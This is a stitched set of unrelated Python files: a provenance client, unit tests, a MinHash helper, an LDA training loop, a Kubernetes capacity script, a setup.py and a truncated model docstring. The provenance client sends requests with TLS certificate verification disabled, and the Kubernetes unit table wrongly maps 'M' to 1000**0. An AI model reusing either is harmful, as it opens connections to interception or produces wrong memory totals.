self.should_store_offline_log = should_store_offline_log
if self.online:
logger.debug("You are using the Service URL: " + service_url)
def close(self, wf_prov_obj: dict):
while not self.session.executor._work_queue.empty():
# wait to guarantee that all provenance requests have been sent to collector service
sleep(0.1)
self.persist_workflow(wf_prov_obj)
# Persist remaining tasks synchronously
self.__flush__(all_and_wait=True)
self.session.close()
def persist_task(self, prov_obj: dict):
try:
data = {
"prov_obj": prov_obj,
"dataflow_name": self.df_name,
"act_type": "task"
}
if self.context:
data["context"] = self.context
self.requests_queue.append(data)
if len(self.requests_queue) >= self.bag_size:
self.__flush__()
except Exception:
logger.error("[Prov] Unexpected exception")
traceback.print_exc()
pass
def persist_workflow(self, prov_obj: dict):
try:
data = {
"prov_obj": prov_obj,
"dataflow_name": self.df_name,
"act_type": "workflow"
}
if self.context:
data["context"] = self.context
self.requests_queue.append(data)
# if `configuration` is present this object should be persisted synchronously
if "configuration" in prov_obj:
self.__flush__(True)
except Exception:
logger.error("[Prov] Unexpected exception")
traceback.print_exc()
pass
def __flush__(self, all_and_wait: bool = False):
if len(self.requests_queue) > 0:
if all_and_wait:
logger.debug("Going to flush everything. Flushing " + str(len(self.requests_queue)))
if self.should_store_offline_log:
offline_prov_log.debug(json.dumps(self.requests_queue))
if self.online:
self.__persist_online__(self.requests_queue)
self.requests_queue = list()
else:
to_flush = self.requests_queue[:self.bag_size]
del self.requests_queue[:self.bag_size]
logger.debug("Going to flush a part. Flushing " + str(len(to_flush)) + " out of " +
str(len(self.requests_queue)))
if self.should_store_offline_log:
offline_prov_log.debug(json.dumps(to_flush))
if self.online:
self.__persist_online__(to_flush)
def __persist_online__(self, to_flush: List[dict]):
params = {"with_validation": str(self.with_validation), "db_name": self.db_name}
try:
logger.debug("[Prov-Persistence]" + json.dumps(to_flush))
r = self.session.post(self.retrospective_url, json=to_flush, params=params, verify=False).result()
except ConnectionError as ex:
logger.error(
"[Prov][ConnectionError] There is a communication error between client and server -> " + str(ex))
r = None
pass
except Exception as ex:
traceback.print_exc()
logger.error(
"[Prov] Unexpected exception while adding retrospective provenance: " + type(ex).__name__
+ "->" + str(ex))
r = None
pass
# If requests were validated, check for errors
if r and self.with_validation:
self.__log_validation_msg__(r)
def persist_prospective(self, json_data: dict):
try:
if self.should_store_offline_log:
offline_prov_log.debug(json.dumps(self.requests_queue))
if self.online:
logger.debug("[Prov-Persistence][Prospective]" + json.dumps(json_data))
try:
r = self.session.post(self.prospective_url, json=json_data, params={'overwrite': True},
verify=False).result()
if 200 <= r.status_code <= 209:
logger.debug("Prospective provenance inserted successfully.")
elif r.status_code == 406:
error_parsed = json.loads(r._content.decode('utf-8'))
error_obj = error_parsed['error'].replace("'", '"')
logger.error(error_obj)
elif r.status_code == 500:
r = self.session.put(self.prospective_url, json=json_data).result()
try:
assert 200 <= r.status_code <= 209
except AssertionError:
logger.error("Prospective provenance was not inserted correctly. Status code = " + str(r.status_code))
elif r.status_code > 300:
logger.error("Prospective provenance was not inserted correctly. Status code = " + str(r.status_code))
except ConnectionError as ex:
traceback.print_exc()
logger.error("[Prov][ConnectionError] There is a communication error between client and server -> " + str(
ex))
pass
except Exception as ex:
logger.error("[Prov] Unexpected exception while adding prospective provenance: " + type(ex).__name__)
pass
except Exception as ex:
logger.error("[Prov] Unexpected exception " + type(ex).__name__)
traceback.print_exc()
pass
@staticmethod
def __log_validation_msg__(response):
error_obj = json.loads(response._content.decode('utf-8'))
if len(error_obj['error']) > 0:
for error_list in error_obj['error']:
for error in error_list:
if error['code'][0] == 'W':
logger.warning('{} {}{}'.format(error['type'], error['explanation'], '\n'))
else:
logger.error('{} {}{}'.format(error['type'], error['explanation'], '\n'))
|
try:
from urllib.request import urlopen # Python 3
except ImportError:
from urllib2 import urlopen # Python 2
import os
import re
import tempfile
from contextlib import contextmanager
import six
URL_REGEX = re.compile(r'http://|https://|ftp://|file://|file:\\')
def is_url(filename):
"""Return True if string is an http or ftp path."""
return (isinstance(filename, six.string_types) and
URL_REGEX.match(filename) is not None)
@contextmanager
def file_or_url_context(resource_name):
"""Yield name of file from the given resource (i.e. file or url)."""
if is_url(resource_name):
_, ext = os.path.splitext(resource_name)
try:
with tempfile.NamedTemporaryFile(delete=False, suffix=ext) as f:
u = urlopen(resource_name)
f.write(u.read())
# f must be closed before yielding
yield f.name
finally:
os.remove(f.name)
else:
yield resource_name
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 by University of Kassel, Tu Dortmund, RWTH Aachen University and Fraunhofer
# Institute for Energy Economics and Energy System Technology (IEE) Kassel and individual
# contributors (see AUTHORS file for details). All rights reserved.
import pytest
import os
from copy import deepcopy
import numpy as np
import pandas as pd
import pandapower as pp
from pandapower.networks import example_simple
from simbench import sb_dir
from simbench.converter import csv2pp, csv_data2pp, pp2csv, pp2csv_data, \
convert_parallel_branches, read_csv_data, ensure_full_column_data_existence, \
avoid_duplicates_in_column, merge_busbar_coordinates
try:
import pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
simbench_converter_test_path = os.path.join(sb_dir, "test", "converter")
test_network_path = os.path.join(simbench_converter_test_path, "test_network")
test_output_folder_path = os.path.join(simbench_converter_test_path, "test_network_output_folder")
__author__ = 'smeinecke'
def test_convert_to_parallel_branches():
# create test grid
net = pp.create_empty_network()
pp.create_bus(net, 110)
pp.create_buses(net, 2, 20)
# --- transformers & corresponding switches
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1")
pp.create_switch(net, 1, 0, "t", name="Tr-Switch 1")
# only name changed:
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 2")
pp.create_switch(net, 1, 1, "t", name="Tr-Switch 2")
# only max_loading changed:
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1", max_loading_percent=50)
pp.create_switch(net, 1, 2, "t", name="Tr-Switch 1")
# only switch position changed:
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1")
pp.create_switch(net, 1, 3, "t", closed=False, name="Tr-Switch 1")
# only switch missing:
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 1")
# only name and std_type changed:
pp.create_transformer(net, 0, 1, "25 MVA 110/20 kV", name="Trafo 3")
pp.create_switch(net, 1, 5, "t", name="Tr-Switch 3")
# only name changed and switch added:
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 4")
pp.create_switch(net, 1, 6, "t", name="Tr-Switch 4a")
pp.create_switch(net, 0, 6, "t", name="Tr-Switch 4b")
# only name and parallel changed:
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="Trafo 5", parallel=2)
pp.create_switch(net, 1, 7, "t", name="Tr-Switch 5")
# --- lines & corresponding switches
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1")
pp.create_switch(net, 2, 0, "l", name="L-Switch 1")
# only name changed:
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 2")
pp.create_switch(net, 2, 1, "l", name="L-Switch 2")
# only max_loading changed:
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1", max_loading_percent=50)
pp.create_switch(net, 2, 2, "l", name="L-Switch 1")
# only switch position changed:
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1")
pp.create_switch(net, 2, 3, "l", closed=False, name="L-Switch 1")
# only switch missing:
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 1")
# only name and std_type changed:
pp.create_line(net, 1, 2, 1.11, "48-AL1/8-ST1A 20.0", name="Line 3")
pp.create_switch(net, 2, 5, "l", name="L-Switch 3")
# only name changed and switch added:
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 4")
pp.create_switch(net, 2, 6, "l", name="L-Switch 4a")
pp.create_switch(net, 1, 6, "l", name="L-Switch 4b")
# only name and parallel changed:
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="Line 5", parallel=2)
pp.create_switch(net, 2, 7, "l", name="L-Switch 5")
# only name and from_bus <-> to_bus changed:
pp.create_line(net, 2, 1, 1.11, "94-AL1/15-ST1A 20.0", name="Line 6")
pp.create_switch(net, 2, 8, "l", name="L-Switch 6")
net1 = deepcopy(net)
net2 = deepcopy(net)
net3 = deepcopy(net)
# complete
convert_parallel_branches(net1, multiple_entries=False)
for elm in ["trafo", "line"]:
assert sorted(net1[elm].index) == [0, 2, 3, 4, 5, 6]
assert list(net1["trafo"].parallel.values) == [4] + [1]*5
assert list(net1["line"].parallel.values) == [5] + [1]*5
# only line
convert_parallel_branches(net2, multiple_entries=False, elm_to_convert=["line"])
assert pp.dataframes_equal(net2.line, net1.line)
assert pp.dataframes_equal(net2.trafo, net.trafo)
# only exclude "max_loading_percent"
convert_parallel_branches(net3, multiple_entries=False, exclude_cols_from_parallel_finding=[
"name", "parallel", "max_loading_percent"])
for elm in ["trafo", "line"]:
assert sorted(net3[elm].index) == [0, 3, 4, 5, 6]
assert list(net3["trafo"].parallel.values) == [5] + [1]*4
assert list(net3["line"].parallel.values) == [6] + [1]*4
def test_convert_parallel_branches():
# create test grid
net = pp.create_empty_network()
pp.create_bus(net, 110)
pp.create_buses(net, 4, 20)
pp.create_ext_grid(net, 0)
pp.create_load(net, 4, 1e3, 4e2)
pp.create_transformer(net, 0, 1, "40 MVA 110/20 kV", name="sd", parallel=3)
pp.create_switch(net, 1, 0, "t", name="dfjk")
pp.create_line(net, 1, 2, 1.11, "94-AL1/15-ST1A 20.0", name="sdh", parallel=2)
pp.create_switch(net, 2, 0, "l", name="dfsdf")
pp.create_line(net, 2, 3, 1.11, "94-AL1/15-ST1A 20.0", name="swed", parallel=1)
pp.create_line(net, 3, 4, 1.11, "94-AL1/15-ST1A 20.0", name="sdhj", parallel=3)
pp.create_switch(net, 3, 2, "l", name="dfdfg")
pp.create_switch(net, 4, 2, "l", False, name="dfhgj")
# check test grid
assert net.trafo.shape[0] == 1
assert net.line.shape[0] == 3
assert net.switch.shape[0] == 4
convert_parallel_branches(net)
# test parallelisation
assert net.trafo.shape[0] == 3
assert net.line.shape[0] == 6
assert net.switch.shape[0] == 11
net1 = deepcopy(net)
net1.switch.closed.loc[4] = False
convert_parallel_branches(net, multiple_entries=False)
convert_parallel_branches(net1, multiple_entries=False)
# test sum up of parallels
assert net.trafo.shape[0] == 1
assert net.line.shape[0] == 3
assert net.switch.shape[0] == 4
assert net1.trafo.shape[0] == 1
assert net1.line.shape[0] == 4
assert net1.switch.shape[0] == 5
def test_test_network():
net = csv2pp(test_network_path, no_generic_coord=True)
# test min/max ratio
for elm in pp.pp_elements(bus=False, branch_elements=False, other_elements=False):
if "min_p_mw" in net[elm].columns and "max_p_mw" in net[elm].columns:
isnull = net[elm][["min_p_mw", "max_p_mw"]].isnull().any(1)
assert (net[elm].min_p_mw[~isnull] <= net[elm].max_p_mw[~isnull]).all()
if "min_q_mvar" in net[elm].columns and "max_q_mvar" in net[elm].columns:
isnull = net[elm][["min_q_mvar", "max_q_mvar"]].isnull().any(1)
assert (net[elm].min_q_mvar[~isnull] <= net[elm].max_q_mvar[~isnull]).all()
pp2csv(net, test_output_folder_path, export_pp_std_types=False, drop_inactive_elements=False)
# --- test equality of exported csv data and given csv data
csv_orig = read_csv_data(test_network_path, ";")
csv_exported = read_csv_data(test_output_folder_path, ";")
all_eq = True
for tablename in csv_orig.keys():
try:
eq = pp.dataframes_equal(csv_orig[tablename], csv_exported[tablename], tol=1e-7)
if not eq:
logger.error("csv_orig['%s'] and csv_exported['%s'] differ." % (tablename,
tablename))
logger.error(csv_orig[tablename].head())
logger.error(csv_exported[tablename].head())
logger.error(csv_orig[tablename].dtypes)
logger.error(csv_exported[tablename].dtypes)
except ValueError:
eq = False
logger.error("dataframes_equal did not work for %s." % tablename)
all_eq &= eq
assert all_eq
def test_example_simple():
net = example_simple()
# --- fix scaling
net.load["scaling"] = 1.
# --- add some additional data
net.bus["subnet"] = ["net%i" % i for i in net.bus.index]
pp.create_measurement(net, "i", "trafo", np.nan, np.nan, 0, "hv", name="1")
pp.create_measurement(net, "i", "line", np.nan, np.nan, 1, "to", name="2")
pp.create_measurement(net, "v", "bus", np.nan, np.nan, 0, name="3")
net.shunt["max_step"] = np.nan
stor = pp.create_storage(net, 6, 0.01, 0.1, -0.002, 0.05, 80, name="sda", min_p_mw=-0.01,
max_p_mw=0.008, min_q_mvar=-0.01, max_q_mvar=0.005)
net.storage.loc[stor, "efficiency_percent"] = 90
net.storage.loc[stor, "self-discharge_percent_per_day"] = 0.3
pp.create_dcline(net, 4, 6, 0.01, 0.1, 1e-3, 1.0, 1.01, name="df", min_q_from_mvar=-0.01)
pp.runpp(net)
to_drop = pp.create_bus(net, 7, "to_drop")
# --- add names to elements
for i in pp.pp_elements():
net[i] = ensure_full_column_data_existence(net, i, 'name')
avoid_duplicates_in_column(net, i, 'name')
# --- create geodata
net.bus_geodata["x"] = [0, 1, 2, 3, 4, 5, 5, 3.63]
net.bus_geodata["y"] = [0]*5+[-5, 5, 2.33]
merge_busbar_coordinates(net)
# --- convert
csv_data = pp2csv_data(net, export_pp_std_types=True, drop_inactive_elements=True)
net_from_csv_data = csv_data2pp(csv_data)
# --- adjust net appearance
pp.drop_buses(net, [to_drop])
del net["OPF_converged"]
net.load["type"] = np.nan
del net_from_csv_data["substation"]
del net_from_csv_data["profiles"]
for key in net.keys():
if isinstance(net[key], pd.DataFrame):
# drop unequal columns
dummy_columns = net[key].columns
extra_columns = net_from_csv_data[key].columns.difference(dummy_columns)
net_from_csv_data[key].drop(columns=extra_columns, inplace=True)
# drop result table rows
if "res_" in key:
if not key == "res_bus":
net[key].drop(net[key].index, inplace=True)
else:
net[key].loc[:, ["p_mw", "q_mvar"]] = np.nan
# adjust dtypes
if net[key].shape[0]:
try:
net_from_csv_data[key] = net_from_csv_data[key].astype(dtype=dict(net[
key].dtypes))
except:
logger.error("dtype adjustment of %s failed." % key)
eq = pp.nets_equal(net, net_from_csv_data, tol=1e-7)
assert eq
if __name__ == "__main__":
if 0:
pytest.main([__file__, "-xs"])
else:
test_convert_to_parallel_branches()
test_convert_parallel_branches()
test_test_network()
test_example_simple()
pass
|
""" MinHash Module
"""
from utils import *
import math
def minhash(rmat, num_shingles, num_signatures):
""" Apply Min Hash per document
Return:
-----
pyspark.rdd
[("business_id", {rating indexes}),..] -> i.e. [("ieuhg", {2, 3}]
"""
# Get hash functions
hash_fns = get_hash_family(num_signatures, num_shingles)
# Apply minhash
def apply_mh(rs):
sign = []
for h in hash_fns: # iterate over hash functions
_minh = math.inf
for r in rs: # iterate over rating indexes
tmp = h(r)
if tmp < _minh:
_minh = tmp
sign.append(_minh)
assert sign.__len__() == len(hash_fns), "Error in shape"
return sign
# Apply minhash over matrix
return rmat.mapValues(apply_mh)
|
#python 3.5.2
print ( 'Linked List (Unorder List)' )
print('-'*20)
class Node:
def __init__(self, data=None):
self.dataNode = data
self.nextNode = None
def getData(self):
return self.dataNode
def setData(self, data=None):
self.dataNode = data
def getNext(self):
return self.nextNode
def setNext(self, next=None):
self.nextNode = next
class LinkedList:
def __init__(self):
self.head = None
self.count = 0
def printRow(self, pointer):
print('DATA: ', pointer.getData(), ' NEXT NODE: ', pointer.getNext() )
def append(self, data=None):
temp = Node(data)
self.count = self.count + 1
if self.head == None:
self.head = temp
else:
pointer = self.head
while pointer.getNext() != None:
pointer = pointer.getNext()
pointer.nextNode = temp
def showLinkedList(self):
pointer = self.head
while pointer.getNext() != None:
self.printRow(pointer)
pointer = pointer.getNext()
self.printRow(pointer)
def len(self):
return self.count
link = LinkedList()
link.append(51)
link.append(23)
link.append(91)
link.append(12)
link.append(32)
link.showLinkedList()
print('-'*20)
print('Length: ', link.len() )
print('-'*20)
'''
OUTPUT:
Linked List (Unorder List)
--------------------
DATA: 51 NEXT NODE: <__main__.Node object at 0x7fc19d92eb38>
DATA: 23 NEXT NODE: <__main__.Node object at 0x7fc19d92eb70>
DATA: 91 NEXT NODE: <__main__.Node object at 0x7fc19d92eba8>
DATA: 12 NEXT NODE: <__main__.Node object at 0x7fc19d92ebe0>
DATA: 32 NEXT NODE: None
--------------------
Length: 5
--------------------
'''
|
# Author: Chris Moody <chrisemoody@gmail.com>
# License: MIT
# This simple example loads the newsgroups data from sklearn
# and train an LDA-like model on it
import os.path
import pickle
import time
from chainer import serializers
from chainer import cuda
import chainer.optimizers as O
import chainer.link as L
import numpy as np
# from lda2vec import prepare_topics, print_top_words_per_topic
# from lda2vec import utils
from lda2vec import topics, utils
from lda import LDA
gpu_id = int(os.getenv('CUDA_GPU', 0))
cuda.get_device(gpu_id).use()
print("Using GPU ", str(gpu_id))
vocab = pickle.load(open('../data/vocab.pkl', 'rb'))
corpus = pickle.load(open('../data/corpus.pkl', 'rb'))
bow = np.load("../data/bow.npy").astype('float32')
# Remove bow counts on the first two tokens, which <SKIP> and <EOS>
bow[:, :2] = 0
# Normalize bag of words to be a probability
# bow = bow / bow.sum(axis=1)[:, None]
# Number of docs
n_docs = bow.shape[0]
# Number of unique words in the vocabulary
n_vocab = bow.shape[1]
# Number of dimensions in a single word vector
n_units = 256
# number of topics
n_topics = 20
batchsize = 128
counts = corpus.keys_counts[:n_vocab]
# Get the string representation for every compact key
words = corpus.word_list(vocab)[:n_vocab]
model = LDA(n_docs, n_topics, n_units, n_vocab)
if os.path.exists('lda.hdf5'):
print("Reloading from saved")
serializers.load_hdf5("lda.hdf5", model)
model.to_gpu()
optimizer = O.Adam()
optimizer.setup(model)
j = 0
fraction = batchsize * 1.0 / bow.shape[0]
for epoch in range(50000000):
if epoch % 100 == 0:
p = cuda.to_cpu(model.proportions.W.data).copy()
f = cuda.to_cpu(model.factors.W.data).copy()
w = cuda.to_cpu(model.embedding.W.data).copy()
d = topics.prepare_topics(p, f, w, words)
topics.print_top_words_per_topic(d)
for (ids, batch) in utils.chunks(batchsize, np.arange(bow.shape[0]), bow):
t0 = time.time()
# optimizer.zero_grads()
model.cleargrads()
rec, ld = model.forward(ids, batch)
l = rec + ld
l.backward()
optimizer.update()
msg = ("J:{j:05d} E:{epoch:05d} L:{rec:1.3e} "
"P:{ld:1.3e} R:{rate:1.3e}")
l.to_cpu()
rec.to_cpu()
ld.to_cpu()
t1 = time.time()
dt = t1 - t0
rate = batchsize / dt
logs = dict(rec=float(rec.data), epoch=epoch, j=j,
ld=float(ld.data), rate=rate)
print(msg.format(**logs))
j += 1
if epoch % 100 == 0:
serializers.save_hdf5("lda.hdf5", model)
|
from art import logo
print(logo)
|
import unittest
from os import path
import os
import shutil
import sys
import json
from subprocess import Popen, PIPE, call
import pprint
from lxml import etree, objectify
from lxml.cssselect import CSSSelector
import pprint
from pyquery import PyQuery as pq
import_path = path.abspath(__file__)
while path.split(import_path)[1] != 'fiware_api_blueprint_renderer':
import_path = path.dirname(import_path)
sys.path.append(import_path)
from src.drafter_postprocessing.order_uri import order_uri_parameters, order_request_parameters
from tests.test_utils import *
from src.renderer import main
class TestTOCJSON(unittest.TestCase):
__metaclass__ = TestCaseWithExamplesMetaclass
@classmethod
def setUpClass(cls):
pathname_ = path.dirname(path.abspath(__file__))
cls.apib_file = pathname_+"/api_test.apib"
cls.tmp_result_files = "/var/tmp/test-links-in-reference-160faf1aae1dd41c8f16746ea744f138"
cls.html_output = cls.tmp_result_files+"api_test.html"
if os.path.exists(cls.tmp_result_files):
shutil.rmtree(cls.tmp_result_files)
os.makedirs(cls.tmp_result_files)
main(["fabre", "-i", cls.apib_file, "-o",
cls.tmp_result_files, "--no-clear-temp-dir"])
parser = etree.HTMLParser()
cls.tree = etree.parse(""+cls.tmp_result_files+"/api_test.html", parser)
cls.pq = pq(filename = cls.tmp_result_files+"/api_test.html")
with open('/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.json', 'r') as f:
cls.out_json = json.load(f)
@classmethod
def tearDownClass(cls):
if os.path.exists(cls.tmp_result_files):
shutil.rmtree(cls.tmp_result_files)
to_delete = ['/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.apib',
'/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.extras',
'/var/tmp/fiware_api_blueprint_renderer_tmp/api_test.json']
for filename in to_delete:
if os.path.exists(filename):
os.remove(filename)
def test_TOC_HTML(self):
sel = CSSSelector('nav#toc')
li_elements=[
{"text":"FIWARE-NGSI v2 Specification",
"href":"#API-content",
"subelements":[]
},
{"text":"API Summary",
"href":"#api-summary",
"subelements":[]
},
{"text":"Specification",
"href":"#specification",
"subelements":[
{"text":"Introduction",
"href":"#introduction",
"subelements":[]
},
]
},
{"text":"Common Payload Definition",
"href":"#common-payload-definition",
"subelements":[]
},
{"text":"API Specification",
"href":"#API_specification",
"subelements":[
{"text":"Group Root",
"href":"#resource_group_root",
"subelements":[
{"text":"GET - Action with attributes and without parent",
"href":"#action_action-with-attributes-and-without-parent",
"subelements":[]
}
]
},
{"text":"Group Entities",
"href":"#resource_group_entities",
"subelements":[
{"text":"Resource Resource with attributes",
"href":"#resource_resource-with-attributes",
"subelements":[
{"text":"GET - Action without attr but with resoruce attr",
"href":"#action_action-without-attr-but-with-resoruce-attr",
"subelements":[]
},
{"text":"POST - action with attr link",
"href":"#action_action-with-attr-link",
"subelements":[]
}
]
},
{"text":"Resource Resource with link",
"href":"#resource_resource-with-link",
"subelements":[
{"text":"GET - Action without attr but with resoruce link",
"href":"#action_action-without-attr-but-with-resoruce-link",
"subelements":[]
},
{"text":"POST - action with attr link",
"href":"#action_action-with-attr-link",
"subelements":[]
},
{"text":"POST - attributes in request test",
"href":"#action_attributes-in-request-test",
"subelements":[]
},
{"text":"GET - atributos con recursividad",
"href":"#action_atributos-con-recursividad",
"subelements":[]
},
]
}
]
},
{"text":"Examples",
"href":"#examples",
"subelements":[]
}
]
},
{
"text":"Acknowledgements",
"href":"#acknowledgements",
"subelements":[]
},
{
"text":"References",
"href":"#references",
"subelements":[]
}
]
self.check_toc_with_list(self.pq("#toc>ul").children(), li_elements)
def check_toc_with_list(self,toc_elements,list_elements):
for child in toc_elements:
try:
next_element = list_elements.pop(0)
except IndexError as e:
print "TOC has too many elements"
assert False
except Exception as e:
print e
assert False
link = pq(child).children("a")
self.assertEqual(pq(link).attr["href"], next_element["href"])
self.assertEqual(pq(link).text().strip(), next_element["text"].strip())
if(len(next_element["subelements"])):
##recursive
self.check_toc_with_list(pq(child).children("ul").children(), next_element["subelements"])
pass
##list must be empty
if (len(list_elements)):
print "Some TOC elements have benn not appeared"
print list_elements
suite = unittest.TestLoader().loadTestsFromTestCase(TestTOCJSON)
unittest.TextTestRunner(verbosity=2).run(suite)
|
#!/usr/bin/env python3
from kubernetes import client, config
k8s_sizing = {
'Ti': 1024 ** 4,
'T': 1000 ** 4,
'Gi': 1024 ** 3,
'G': 1000 ** 3,
'Mi': 1024 ** 2,
'M': 1000 ** 0,
'Ki': 1024 ** 1,
'K': 1000 ** 1,
}
def mem_to_bytes(k8s_size):
unit = ''.join(filter(lambda x: x.isalpha(), k8s_size))
size = int(k8s_size.rstrip(unit))
try:
return size * k8s_sizing[unit.capitalize()]
except KeyError:
return size
def mem_from_bytes(size_bytes, unit):
return size_bytes / k8s_sizing[unit]
def cpu_to_cores(size):
try:
return int(size)
except ValueError:
size = size.rstrip('m')
return int(size) / 1000
# Configs can be set in Configuration class directly or using helper utility
config.load_kube_config()
v1 = client.CoreV1Api()
def get_request_limit_totals():
ret = v1.list_pod_for_all_namespaces(watch=False)
mem_requests = 0
mem_limits = 0
cpu_requests = 0
cpu_limits = 0
for pod in ret.items:
for c in pod.spec.containers:
if c.resources.limits is not None:
if "cpu" in c.resources.limits:
cpu_limits += cpu_to_cores(c.resources.limits["cpu"])
if "memory" in c.resources.limits:
mem_limits += mem_to_bytes(
c.resources.limits["memory"])
if c.resources.requests is not None:
if "cpu" in c.resources.requests:
cpu_requests += cpu_to_cores(
c.resources.requests["cpu"])
if "memory" in c.resources.requests:
mem_requests += mem_to_bytes(
c.resources.requests["memory"])
return cpu_requests, cpu_limits, mem_requests, mem_limits
def get_cluster_capacity():
cpu_a = 0
mem_a = 0
ret = v1.list_node()
for node in ret.items:
cpu_a += cpu_to_cores(node.status.allocatable["cpu"])
mem_a += mem_to_bytes(node.status.allocatable["memory"])
return cpu_a, mem_a
total_cpu_requests, total_cpu_limits, total_mem_requests, total_mem_limits = get_request_limit_totals()
total_cpu, total_memory = get_cluster_capacity()
print()
for args in (
('CPU Requests', 'CPU Limits', 'Memory Requests', 'Memory Limits'),
('------------', '----------', '---------------', '-------------'),
(
'{} Cores ({:.0%})'.format(
str(total_cpu_requests),
total_cpu_requests / total_cpu
),
'{} Cores ({:.0%})'.format(
str(total_cpu_limits),
total_cpu_limits / total_cpu
),
'{}Gi ({:.0%})'.format(
str(mem_from_bytes(total_mem_requests, 'Gi')),
total_mem_requests / total_memory
),
'{}Gi ({:.0%})'.format(
str(mem_from_bytes(total_mem_limits, 'Gi')),
total_mem_limits / total_memory
)
)
):
print('{0:<30} {1:<30} {2:<30} {3:<30}'.format(*args))
|
from setuptools import setup, find_packages
setup(
name='telegram-media-bot',
version="2.1",
packages=find_packages(),
scripts=['telegram-media-bot/telegram-media-bot.py'],
install_requires=['tweepy>=3.5.0', 'praw<=3.6.0', 'requests>=2.12.3'],
author='Murat Özel',
description='Send pictures and videos from Twitter and Reddit to a Telegram-Chat',
license='MIT',
keywords='reddit telegram twitter',
url="https://blog.yamahi.eu",
)
|
"""This module implements patch-level prediction."""
import copy
import os
import pathlib
import warnings
from collections import OrderedDict
from typing import Callable, Tuple, Union
import numpy as np
import torch
import tqdm
from tiatoolbox.models.architecture import get_pretrained_model
from tiatoolbox.models.dataset.classification import PatchDataset, WSIPatchDataset
from tiatoolbox.models.engine.semantic_segmentor import IOSegmentorConfig
from tiatoolbox.utils import misc
from tiatoolbox.utils.misc import save_as_json
from tiatoolbox.wsicore.wsireader import VirtualWSIReader, get_wsireader
class IOPatchPredictorConfig(IOSegmentorConfig):
"""Contain patch predictor input and output information."""
def __init__(
self,
patch_input_shape=None,
input_resolutions=None,
stride_shape=None,
**kwargs,
):
stride_shape = patch_input_shape if stride_shape is None else stride_shape
super().__init__(
input_resolutions=input_resolutions,
output_resolutions=[],
stride_shape=stride_shape,
patch_input_shape=patch_input_shape,
patch_output_shape=patch_input_shape,
save_resolution=None,
**kwargs,
)
class PatchPredictor:
"""Patch-level predictor.
The models provided by tiatoolbox should give the following results:
.. list-table:: PatchPredictor performance on the Kather100K dataset [1]
:widths: 15 15
:header-rows: 1
* - Model name
- F\ :sub:`1`\ score
* - alexnet-kather100k
- 0.965
* - resnet18-kather100k
- 0.990
* - resnet34-kather100k
- 0.991
* - resnet50-kather100k
- 0.989
* - resnet101-kather100k
- 0.989
* - resnext50_32x4d-kather100k
- 0.992
* - resnext101_32x8d-kather100k
- 0.991
* - wide_resnet50_2-kather100k
- 0.989
* - wide_resnet101_2-kather100k
- 0.990
* - densenet121-kather100k
- 0.993
* - densenet161-kather100k
- 0.992
* - densenet169-kather100k
- 0.992
* - densenet201-kather100k
- 0.991
* - mobilenet_v2-kather100k
- 0.990
* - mobilenet_v3_large-kather100k
- 0.991
* - mobilenet_v3_small-kather100k
- 0.992
* - googlenet-kather100k
- 0.992
.. list-table:: PatchPredictor performance on the PCam dataset [2]
:widths: 15 15
:header-rows: 1
* - Model name
- F\ :sub:`1`\ score
* - alexnet-pcam
- 0.840
* - resnet18-pcam
- 0.888
* - resnet34-pcam
- 0.889
* - resnet50-pcam
- 0.892
* - resnet101-pcam
- 0.888
* - resnext50_32x4d-pcam
- 0.900
* - resnext101_32x8d-pcam
- 0.892
* - wide_resnet50_2-pcam
- 0.901
* - wide_resnet101_2-pcam
- 0.898
* - densenet121-pcam
- 0.897
* - densenet161-pcam
- 0.893
* - densenet169-pcam
- 0.895
* - densenet201-pcam
- 0.891
* - mobilenet_v2-pcam
- 0.899
* - mobilenet_v3_large-pcam
- 0.895
* - mobilenet_v3_small-pcam
- 0.890
* - googlenet-pcam
- 0.867
Args:
model (nn.Module):
Use externally defined PyTorch model for prediction with.
weights already loaded. Default is `None`. If provided,
`pretrained_model` argument is ignored.
pretrained_model (str):
Name of the existing models support by tiatoolbox for
processing the data. For a full list of pretrained models,
refer to the `docs
<https://tia-toolbox.readthedocs.io/en/latest/pretrained.html>`_
By default, the corresponding pretrained weights will also
be downloaded. However, you can override with your own set
of weights via the `pretrained_weights` argument. Argument
is case-insensitive.
pretrained_weights (str):
Path to the weight of the corresponding `pretrained_model`.
>>> predictor = PatchPredictor(
... pretrained_model="resnet18-kather100k",
... pretrained_weights="resnet18_local_weight")
batch_size (int):
Number of images fed into the model each time.
num_loader_workers (int):
Number of workers to load the data. Take note that they will
also perform preprocessing.
verbose (bool):
Whether to output logging information.
Attributes:
img (:obj:`str` or :obj:`pathlib.Path` or :obj:`numpy.ndarray`):
A HWC image or a path to WSI.
mode (str):
Type of input to process. Choose from either `patch`, `tile`
or `wsi`.
model (nn.Module):
Defined PyTorch model.
pretrained_model (str):
Name of the existing models support by tiatoolbox for
processing the data. For a full list of pretrained models,
refer to the `docs
<https://tia-toolbox.readthedocs.io/en/latest/pretrained.html>`_
By default, the corresponding pretrained weights will also
be downloaded. However, you can override with your own set
of weights via the `pretrained_weights` argument. Argument
is case insensitive.
batch_size (int):
Number of images fed into the model each time.
num_loader_workers (int):
Number of workers used in torch.utils.data.DataLoader.
verbose (bool):
Whether to output logging information.
Examples:
>>> # list of 2 image patches as input
>>> data = [img1, img2]
>>> predictor = PatchPredictor(pretrained_model="resnet18-kather100k")
>>> output = predictor.predict(data, mode='patch')
